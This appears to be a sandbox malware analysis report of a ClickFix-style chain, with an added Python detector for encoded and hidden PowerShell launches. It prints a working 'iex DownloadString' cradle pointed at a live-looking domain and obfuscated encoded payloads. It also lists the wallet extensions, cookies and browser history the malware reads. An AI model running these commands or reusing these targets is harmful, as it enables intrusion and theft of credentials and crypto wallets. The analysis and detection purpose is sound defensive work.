Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command "iex ((New-Object System.Net.WebClient).DownloadString('https://e1.foiloverturnarrival.shop/app_permissions.json'))"
Source: C:\Windows\System32\mshta.exe Process created: Base64 decoded $nMq5LiObPXHWFHldk9PS1OGyR43IcwrXZdOMbFNKTQ = $fALsE$zFQPaqsw6zu2eh5JcNHZhlyocZhWZ1jk4bKQctkmaXilCz2psLLjLzuckbTtyEEVrHym2chEBuQ7cydN = $TRUe$kMIbwIS8Tq3660kan2CYFMcdWeNBW1wYVuzoCbZ66yrnWeuw9MDIwDgeSKd5pY1GYiHWgEWLyQR8d2Jo7TkMQcM3k3oER7hsZNNs8O3NCb3APNj4MlFSelwMtSizBXiQpPcVkxtHQYCUCW2SIwHPGlYpKtuGdJcKaX666ngrS86DvEDg0eDGsqRHxdgm6NEqOkc6G7GDQDFvupBGqv4j5ElpyPv0qcN7Z5guweLDUuUrPql = $nULL$mdAMYmUEbbpxBWYAasZmNSW7OLJArePHXHTTQ5s6MqqnwwE0peWGeZMoNtJ3FR7SxuYcqsdjsbbmkixPzgfjSnJ9AFWEYKLEYYrLBCedX4dKnIZFwwbhADVsMObluX8RYEIaLOqMCPHwDuYxTO4t2HmlzFycMmH18cGzJZgI5sxSnyef6nyptKev5AX5RwB4dkqEIMfQW3tGCRVMOpE4GtiAymB6f3cdr7BMQPGimYbdRmPV5ARYhbSg7zoKTtNgIIEIHncZV204sNURdbN9cWWQKuMpjqmhymGcQw0C7uuTQrG01Ff2Xz ="Defla" + "teStream";$d1OBxL17U144VQli9d9QOL75zT03xHILbkzdg9X5AXcE1x0Pu8UQ9TbmEV9bTaXFcO82xU7lwnVSsQ2s8EhdgDiZkO7Sgz0ORNzSsZ7AjBTZId8bQ8B5Q6OsRle6dHQkZpLyqrpiuMmXQRWYFl8EolIWQt5pgMj6YupRcD9x6SMX1sZ3T5nF9z6uLlcJ9GEiTZ9aTL8f5qbYLgj2Ryn9ijNtnxTrmsQcqg1VZkPhVhd5worNvn25fXXOaSw1jWGAkjd4LzwOnldpjDd1KShXd7oSY7NPxyULs7gF9eqcSOn92fcfIQyFzKewaHrxIQofODeLbYCtqLisaFMcQzCltkdm3R9MOpl = "Compre" + "ssion"; $1psJbjhOhuL6VmxZBo3NEB9tYRkTeLkMUI4dj06lmRLFJ7NLmbHI6QSP2g520PuNhCkeLd48PwTUlARm8N2SeaiVXfd2JjauwWjW34suQavdDbREc1aN6tVi8XvH2wbNGO15GZK32q6kL1ZOaQcCMkUeg8jsgjyzoZFFFpzRyIxxFuaDwBu1gQtOrhVXeL9nKiMYWHFPYWQDi7XUojHckscvdTSkWORLXQsnLHhq1rBnmBDqyhtKPkF0MBhIUB4zlkMHTSDVLCOy56Xm6g6ZsmXAsz4VpMW31NGoSkR9qsQeJyRv4JR3NQbcJMXhiaR5izxkw4LXSyH97epHdRHHh5C2hxrrnBY5lIbjdL4doY0u9hGguYw6bYmjTMxzFDg5nP8A
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -Enc 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
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -enc jabuae0acqa1aewaaqbpagiauabyaegavwbgaegababkagsaoqbqafmamqbpaecaeqbsadqamwbjagmadwbyafgawgbkae8atqbiaeyatgblafqauqagad0aiaakagyaqqbmahmarqanaaoajab6aeyauqbqageacqbzahcangb6ahuamgblagganqbkagmatgbiafoaaabsahkabwbjafoaaabxafoamqbqagsanabiaesauqbjahqaawbtageawabpagwaqwb6adiacabzaewatabqaewaegb1agmaawbiafqadab5aeuarqbwahiasab5ag0amgbjaggarqbcahuauqa3agmaeqbkae4aiaa9acaajabuafiavqblaa0acgakagsatqbjagiadwbjafmaoabuaheamwa2adyamabrageabgayaemawqbgae0aywbkafcazqboaeiavwaxahcawqbwahuaegbvaemaygbaadyangb5ahiabgbxaguadqb3adkatqbeaekadwbeagcazqbtaesazaa1ahaawqaxaecawqbpaegavwbnaeuavwbmahkauqbsadgazaayaeoabwa3afqaawbnafeaywbnadmaawazag8arqbsadcaaabzafoatgboahmaoabpadmatgbdagiamwbbafaatgbqadqatqbsaeyauwblagwadwbnahqauwbpahoaqgbyagkauqbwafaaywbwagsaeab0aegauqbzaemavqbdafcamgbtaekadwbiafaarwbsafkacablahqadqbhagqasgbjaesayqbyadyanga2ag4azwbyafmaoaa2aeqadgbfaeqazwawaguarabhahmacqbsaegaeabkagcabqa2ae4arqbxae8aawbjadyarwa3aecarabraeqargb2ahuacabcaecacqb2adqaaga1aeuababwahkauab2adaacqbjae4anwbaaduazwb1ahcazqbmaeqavqb1afuacgbqaheabaagad0aiaakag4avqbmaewadqakacqabqbkaeeatqbzag0avqbfagiaygbwahgaqgbxafkaqqbhahmawgbtae4auwbxadcatwbmaeoaqqbyaguauabiafgasabuafqauqa1ahmangbnaheacqbuahcadwbfadaacablafcarwblafoatqbvae4adabkadmargbsadcauwb4ahuawqbjaheacwbkagoacwbiagiabqbragkaeabqahoazwbmagoauwbuaeoaoqbbaeyavwbfafkaswbmaeuawqbzahiatabcaemazqbkafganabkaesabgbjafoargb3ahcaygboaeearabwahmatqbpagiabab1afgaoabsafkarqbjageatabpaheatqbdafaasab3aeqadqbzahgavabpadqadaayaegabqbsahoargb5agmatqbtaegamqa4agmarwb6aeoawgbnaekanqbzahgauwbuahkazqbmadyabgb5ahaadablaguadga1aeeawaa1afiadwbcadqazabrahearqbjae0azgbrafcamwb0aecaqwbsafyatqbpahaarqa0aecadabpaeeaeqbtaeiangbmadmaywbkahianwbcae0auqbqaecaaqbtafkaygbkafiabqbqafyanqbbafiawqboagiauwbnadcaegbvaesavab0ae4azwbjaekarqbjaegabgbjafoavgayadaanabzae4avqbsagqaygboadkaywbxafcauqblahuatqbwagoac
qbtaggaeqbtaecaywbrahcamabdadcadqb1afqauqbyaecamaaxaeyazgayafgaegagad0aigbeaguazgbsageaigagacsaiaaiahqazqbtahqacgblageabqaiadsajabkadeatwbcahgataaxadcavqaxadqanabwafeababpadkazaa5afeatwbmadcanqb6afqamaazahgasabjaewaygbrahoazabnadkawaa1aeeawabjaeuamqb4adaauab1adgavqbradkavabiag0arqbwadkaygbuageawabgagmatwa4adiaeabvadcabab3ag4avgbtahmauqayahmaoabfaggazabnaeqaaqbaagsatwa3afmazwb6adaatwbsae4aegbtahmawga3aeeaagbcafqawgbjagqaoabiafeaoabcaduauqa2ae8acwbsagwazqa2agqasabragsawgbwaewaeqbxahiacabpahuatqbtafgauqbsafcawqbgagwaoabfag8ababjafcauqb0aduacabnae0aaga2afkadqbwafiaywbeadkaeaa2afmatqbyadeacwbaadmavaa1ag4arga5ahoangb1aewababjaeoaoqbhaeuaaqbuafoaoqbhafqataa4agyanqbxagiawqbmagcaagayafiaeqbuadkaaqbqae4adabuahgavabyag0acwbragmacqbnadeavgbaagsauaboafyaaabkaduadwbvahiatgb2ag4amga1agyawabyae8ayqbtahcamqbqafcarwbbagsaagbkadqatab6ahcatwbuagwazabwagoarabkadeaswbtaggawabkadcabwbtafkanwboafaaeab5afuatabzadcazwbgadkazqbxagmauwbpag4aoqayagyaywbmaekauqb5aeyaegblaguadwbhaegacgb4aekauqbvagyatwbeaguatabiafkaqwb0aheatabpahmayqbgae0aywbrahoaqwbsahqaawbkag0amwbsadka
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -w 1 -enc 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
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\mshta.exe Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
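The process-creation entries above record the ClickFix launch chain: mshta.exe starts powershell.exe with -w 1 -Enc <base64>, that script starts a 32-bit powershell.exe with -w hidden -ep bypass -nop -Command "iex (… DownloadString(…))", and the sandbox's "Base64 decoded" entry shows the encoded stage building strings such as "Defla" + "teStream" to dodge static matching. The Python below is an added example for this report, not code from Joe Sandbox or from the sample: it decodes an -EncodedCommand argument the way powershell.exe does (base64 of UTF-16LE text) and scores a process-creation event for the tells seen here (script-host parent, hidden window including the numeric form -w 1, -ep bypass, -nop, a download-and-execute cradle, split-string obfuscation). The three sample events, the encoded script, the host c2.example.invalid and the parent/image/cmdline field names are constructed here and are not values from the page.

```python
import base64
import re

# Constructed sample events modelled on the mshta.exe -> powershell.exe -Enc ->
# powershell.exe -w hidden -ep bypass -nop chain in the report.  The encoded script,
# the host c2.example.invalid and the parent/image/cmdline field names are
# assumptions made here, not values taken from the page.
STAGE2_SCRIPT = (
    '$a = $fALsE; $b = "Defla" + "teStream"; $c = "Compre" + "ssion"; '
    "iex ((New-Object System.Net.WebClient).DownloadString('https://c2.example.invalid/x'))"
)


def encode_for_powershell(script: str) -> str:
    """Build what powershell.exe -EncodedCommand expects: base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


SAMPLE_EVENTS = [
    {"parent": "mshta.exe", "image": "powershell.exe",
     "cmdline": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -w 1 -Enc '
                + encode_for_powershell(STAGE2_SCRIPT)},
    {"parent": "powershell.exe", "image": "powershell.exe",
     "cmdline": '"C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe" -w hidden '
                '-ep bypass -nop -Command "iex ((New-Object System.Net.WebClient)'
                ".DownloadString('https://c2.example.invalid/app_permissions.json'))\""},
    {"parent": "explorer.exe", "image": "powershell.exe",          # benign contrast
     "cmdline": '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
                "-NoProfile -File C:\\Scripts\\inventory.ps1"},
]

# powershell.exe accepts any unambiguous prefix of a parameter name, so match
# -e/-ec/-enc/-EncodedCommand followed by a base64 run; "-ep bypass" is too short to hit.
ENCODED = re.compile(r"(?i)(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})")
HIDDEN = re.compile(r"(?i)-w(?:indowstyle)?\s+(?:hidden|1)\b")  # 1 == ProcessWindowStyle.Hidden
EP_BYPASS = re.compile(r"(?i)-e(?:xecutionpolicy|p)\s+(?:bypass|unrestricted)\b")
NO_PROFILE = re.compile(r"(?i)-nop(?:rofile)?\b")
CRADLE = re.compile(r"(?i)downloadstring|downloadfile|downloaddata|net\.webclient|"
                    r"invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b")
EXEC = re.compile(r"(?i)\biex\b|invoke-expression")
SPLIT_STRING = re.compile(r'"[A-Za-z]+"\s*\+\s*"[A-Za-z]+"')  # "Defla" + "teStream"
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
WEIGHTS = {"script_host_parent": 3, "encoded_command": 2, "hidden_window": 2,
           "execution_policy_bypass": 2, "no_profile": 1,
           "download_and_execute": 5, "split_string_obfuscation": 1}


def decode_encoded_command(cmdline: str):
    """Return the script behind -EncodedCommand, or None if absent or not decodable."""
    m = ENCODED.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse(event: dict) -> dict:
    """Score one process-creation event; the decoded script is scanned together
    with the visible command line so cradles hidden behind -Enc still count."""
    cmd = event["cmdline"]
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + "\n" + decoded
    findings = []
    if event["parent"].lower() in SCRIPT_HOSTS:
        findings.append("script_host_parent")
    if decoded is not None:
        findings.append("encoded_command")
    if HIDDEN.search(cmd):
        findings.append("hidden_window")
    if EP_BYPASS.search(cmd):
        findings.append("execution_policy_bypass")
    if NO_PROFILE.search(cmd):
        findings.append("no_profile")
    if CRADLE.search(text) and EXEC.search(text):
        findings.append("download_and_execute")
    if SPLIT_STRING.search(text):
        findings.append("split_string_obfuscation")
    s = sum(WEIGHTS[f] for f in findings)
    return {"findings": findings, "decoded": decoded, "score": s,
            "verdict": "malicious" if s >= 5 else "suspicious" if s >= 2 else "benign"}


if __name__ == "__main__":
    for e in SAMPLE_EVENTS:
        r = analyse(e)
        print(f"{r['verdict']:10} {e['parent']} -> {e['image']}: {', '.join(r['findings']) or '-'}")
```

Base64 is case-sensitive, so the copies of the -enc blob that the report renders in lower case (the entries whose path also reads c:\windows\system32\…) will not decode; feed the decoder the mixed-case rendering. The weights are illustrative: -NoProfile on its own is routine in scheduled tasks, which is why it scores low, while a cradle plus iex is decisive on its own.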

Stealing of Sensitive Information

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\8h0a78bs.default-release\formhistory.sqlite
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
